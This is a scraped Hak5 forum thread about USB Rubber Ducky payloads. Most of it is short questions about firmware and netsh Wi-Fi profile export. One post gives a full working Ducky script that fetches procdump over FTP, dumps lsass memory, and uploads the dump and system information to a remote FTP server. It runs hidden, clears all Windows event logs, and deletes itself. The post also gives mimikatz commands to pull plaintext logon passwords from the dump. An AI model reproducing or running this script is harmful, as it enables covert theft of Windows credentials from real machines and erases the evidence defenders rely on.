waddell

Will this be ported over to Firmware v3.X? Also is there anywhere I can manually download this on my pc (just to inspect the code)?

I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.

I wrote the same thing but instead uploads to ftp server quietly in the background. You may want to make a rule for windows firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the ducky in long enough to write the files and start the process. After uploading it literally deletes itself. https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/ Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to backup the dump file remotely once it's created. Also, you can send commands to mimikatz, might look like this (change dmp file name if needed): mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

I'm sure this can be more discrete, and possibly faster, but this was the simplest way to get what I wanted done. Once you have the dmp file, just use mimikatz to find the passwords. Note: Some of this needs to be edited for your FTP server's information (pay attention) You may need to modify this for UAC Thanks to: https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/ https://forums.hak5.org/index.php?/topic/30103-payload-exfiltration-via-wifi/ http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html REM Payload: FTP LSASS dump for password stealing REM Target: Windows 7 REM Author: Matt Waddell REM Some information taken from other payloads on forums, but this is a nice working utility for dumping passwords to ftp server REM Copies files to target machine and executes it hidden in background so you are very quick with the attack REM There is probably many better ways to do what I am doing, but as a sys admin this is what I needed to prove a point DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /F:OFF /V:ON /K DELAY 500 ENTER REM *** Some Quick Clean Up (Just In Case) *** REM Will remove any existing files to make scripts work quicker and better STRING if not exist C:\Temp md C:\Temp ENTER STRING erase /Q C:\Temp\procdump.exe ENTER STRING erase /Q C:\Temp\*.dmp ENTER STRING erase /Q C:\Temp\*.txt ENTER STRING erase /Q C:\Temp\*.bat ENTER STRING erase /Q C:\Temp\*.ftp ENTER STRING erase /Q C:\Temp\*.vbs ENTER STRING CD C:\Temp ENTER REM *** ftp_down.txt *** REM Your download settings for grabbing procdump off your ftp server (minimizes need for local storage device) (modify as needed) STRING copy con ftp_down.ftp ENTER STRING USER *********** ENTER STRING *******PASS********* ENTER STRING get procdump.exe C:\Temp\procdump.exe ENTER STRING bye ENTER CONTROL Z ENTER REM *** ftp_up.txt *** REM Your upload settings for putting the lsass dump and some system information settings on your ftp server (modify as needed) STRING copy con ftp_up.ftp ENTER STRING USER *********** ENTER STRING *******PASS********* ENTER STRING put C:\Temp\*.dmp ENTER STRING put C:\Temp\*.txt ENTER STRING bye ENTER CONTROL Z ENTER REM *** ftp_lsass.bat *** REM Runs in background, downloads procdump, dumps passwords, uploads dump and system info, deletes all files, clears logs STRING copy con ftp_lsass.bat ENTER STRING ftp -n -s:C:\Temp\ftp_down.ftp **********server************* ENTER STRING procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp ENTER STRING systeminfo > C:\Temp\%COMPUTERNAME%_system.txt ENTER STRING ftp -n -s:C:\Temp\ftp_up.ftp **********server************* ENTER STRING erase /Q C:\Temp\procdump.exe ENTER STRING erase /Q C:\Temp\*.dmp ENTER STRING erase /Q C:\Temp\*.txt ENTER STRING erase /Q C:\Temp\*.ftp ENTER STRING erase /Q C:\Temp\*.vbs ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER STRING del %0 ENTER STRING exit ENTER CONTROL z ENTER REM *** VBS File for Running Invisibly *** STRING copy con C:\Temp\invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run Primary Payload and Close Rubber Ducky Cmd Window (can remove ducky when it is closed, everything else is in background) *** STRING wscript.exe C:\Temp\invis.vbs C:\Temp\ftp_lsass.bat && exit ENTER